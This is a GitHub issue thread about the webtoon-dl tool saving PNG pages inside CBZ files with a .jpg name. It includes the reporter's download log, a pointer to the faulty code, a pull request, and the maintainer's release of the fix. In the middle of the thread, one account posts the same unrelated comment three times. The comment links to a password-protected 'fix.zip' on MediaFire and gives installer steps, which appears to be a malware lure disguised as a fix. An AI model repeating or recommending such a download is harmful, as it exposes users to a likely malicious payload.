### ISSUE TITLE
CBZ Format Assumes Images Are JPEGs, But Some Are PNGs

### ISSUE THREAD

**Issue by pjkaufman** [robinovitch61/webtoon-dl#11]
Read and checkbox the following by putting an "x" in the brackets like `- [x]` before submitting this bug report:

- [x] I have searched existing issues, opened and closed, for existing solutions to my problem
- [x] I understand that I have to fill out all of the following or risk my issue being closed and locked

**What you ran, all the output, and the entire error message, if any**
``` bash
webtoon-dl --format cbz "https://www.webtoons.com/en/fantasy/tower-of-god/season-1-ep-12/viewer?title_no=95&episode_no=13"
found 42 total image links across 1 episodes
saving into 1 files with max of 10 episodes per file
saving episodes 13 through 13 of 1: added page 1/42
saving episodes 13 through 13 of 1: added page 2/42
saving episodes 13 through 13 of 1: added page 3/42
saving episodes 13 through 13 of 1: added page 4/42
saving episodes 13 through 13 of 1: added page 5/42
saving episodes 13 through 13 of 1: added page 6/42
saving episodes 13 through 13 of 1: added page 7/42
saving episodes 13 through 13 of 1: added page 8/42
saving episodes 13 through 13 of 1: added page 9/42
saving episodes 13 through 13 of 1: added page 10/42
saving episodes 13 through 13 of 1: added page 11/42
saving episodes 13 through 13 of 1: added page 12/42
saving episodes 13 through 13 of 1: added page 13/42
saving episodes 13 through 13 of 1: added page 14/42
saving episodes 13 through 13 of 1: added page 15/42
saving episodes 13 through 13 of 1: added page 16/42
saving episodes 13 through 13 of 1: added page 17/42
saving episodes 13 through 13 of 1: added page 18/42
saving episodes 13 through 13 of 1: added page 19/42
saving episodes 13 through 13 of 1: added page 20/42
saving episodes 13 through 13 of 1: added page 21/42
saving episodes 13 through 13 of 1: added page 22/42
saving episodes 13 through 13 of 1: added page 23/42
saving episodes 13 through 13 of 1: added page 24/42
saving episodes 13 through 13 of 1: added page 25/42
saving episodes 13 through 13 of 1: added page 26/42
saving episodes 13 through 13 of 1: added page 27/42
saving episodes 13 through 13 of 1: added page 28/42
saving episodes 13 through 13 of 1: added page 29/42
saving episodes 13 through 13 of 1: added page 30/42
saving episodes 13 through 13 of 1: added page 31/42
saving episodes 13 through 13 of 1: added page 32/42
saving episodes 13 through 13 of 1: added page 33/42
saving episodes 13 through 13 of 1: added page 34/42
saving episodes 13 through 13 of 1: added page 35/42
saving episodes 13 through 13 of 1: added page 36/42
saving episodes 13 through 13 of 1: added page 37/42
saving episodes 13 through 13 of 1: added page 38/42
saving episodes 13 through 13 of 1: added page 39/42
saving episodes 13 through 13 of 1: added page 40/42
saving episodes 13 through 13 of 1: added page 41/42
saving episodes 13 through 13 of 1: added page 42/42
saved to en-fantasy-tower-of-god-season-1-ep-12-epNo13.cbz
```
**Note: the issue is located in `0000000010.jpg` for the command above since it was not run on 10 episodes like the one in the screenshot below.**

![test](https://github.com/user-attachments/assets/c97c214e-e31e-4446-9208-55f53ea42f23)

**Expected behavior**
When a webtoon has a PNG the file should be saved to the downloaded cbz as a `.png` not a `.jpg`.

**Screenshots**

**Complete the following information:**
 - OS [e.g. Mac, Windows, Ubuntu, Arch, NixOS, etc.]: PopOs
 - Version [e.g. v0.0.5]: 22.04
 - Available space on disk [e.g. 10GB]: 180GB
 - RAM [e.g. 8GB]: 8GB

**Additional context**
This issue does not directly cause issues with opening the cbz. However it can cause some applications and code to try handling the PNGs as JPEGs which can cause issues.

It looks like add image assumes that all files will be a jpg file [here](https://github.com/robinovitch61/webtoon-dl/blob/f3643c85a9b5bc8f48751f0bf225ebb181b52ada/main.go#L95). I think adding the suffix as a param to that interface function should fix this issue.

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by robinovitch61** [comment]
Hey @pjkaufman thanks for the comprehensive report! Since you already did the digging to identify a potential fix, would you want to open a pull request to make the change? If not I'll try to get to it soon.

**Comment by pjkaufman** [comment]
> Hey @pjkaufman thanks for the comprehensive report! Since you already did the digging to identify a potential fix, would you want to open a pull request to make the change? If not I'll try to get to it soon.

I can definitely take a stab at it. I don't think it will be too hard to fix.

**Comment by pjkaufman** [comment]
I just put in a PR @robinovitch61 . Feel free to give feedback on what you think about it: https://github.com/robinovitch61/webtoon-dl/pull/12

It looks to work at this time. I am seeing a lot of PNGs for the link used above, with a JPEG being present as well.

**Comment by robinovitch61** [comment]
Released in v0.0.10

**Comment by pjkaufman** [comment]
Thanks for the speedy response and turn around!
